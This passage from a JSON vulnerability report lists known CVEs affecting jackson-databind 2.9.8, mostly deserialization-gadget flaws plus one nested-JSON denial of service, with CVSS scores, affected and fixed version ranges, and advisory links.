Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"NetApp Advisory","text":"ntap-20220506-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deeply nested json in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deeply nested json in jackson-databind jackson-databind is a data-binding package for the Jackson Data Processor. jackson-databind allows a Java stack overflow exception and denial of service via a large depth of nested objects."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00001.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36518"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36518"},{"summary":"NetApp Advisory ntap-20220506-0004","url":"https://security.netapp.com/advisory/ntap-20220506-0004"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2020-36518/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11112"]}],"cve":"CVE-2020-11112","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-10T21:12:41","ids":[{"system_name":"CVE Record","text":"CVE-2020-11112"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11112"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11112"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11112/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-20190"]}],"cve":"CVE-2021-20190","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-01-20T21:20:15","ids":[{"system_name":"CVE Record","text":"CVE-2021-20190"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"NetApp Advisory","text":"ntap-20210219-0008"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1916633"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in jackson-databind A flaw was found in jackson-databind before 2.9.10.7 and 2.6.7.5. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.7"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.7"]},"references":[{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1916633"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a@%3Ccommits.nifi.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20190"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20190"},{"summary":"NetApp Advisory ntap-20210219-0008","url":"https://security.netapp.com/advisory/ntap-20210219-0008"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.7"]}],"title":"CVE-2021-20190/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9546"]}],"cve":"CVE-2020-9546","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T21:08:40","ids":[{"system_name":"CVE Record","text":"CVE-2020-9546"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9546"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9546"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9546/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35728"]}],"cve":"CVE-2020-35728","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:24","ids":[{"system_name":"CVE Record","text":"CVE-2020-35728"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210129-0007"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Serialization gadget exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadget exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35728"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35728"},{"summary":"NetApp Advisory ntap-20210129-0007","url":"https://security.netapp.com/advisory/ntap-20210129-0007"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35728/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10969"]}],"cve":"CVE-2020-10969","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T21:36:03","ids":[{"system_name":"CVE Record","text":"CVE-2020-10969"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10969"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10969"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10969/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36182"]}],"cve":"CVE-2020-36182","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:46","ids":[{"system_name":"CVE Record","text":"CVE-2020-36182"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36182"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36182"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36182/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36180"]}],"cve":"CVE-2020-36180","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:18","ids":[{"system_name":"CVE Record","text":"CVE-2020-36180"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36180"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36180"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36180/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36185"]}],"cve":"CVE-2020-36185","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:02","ids":[{"system_name":"CVE Record","text":"CVE-2020-36185"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36185"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36185"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 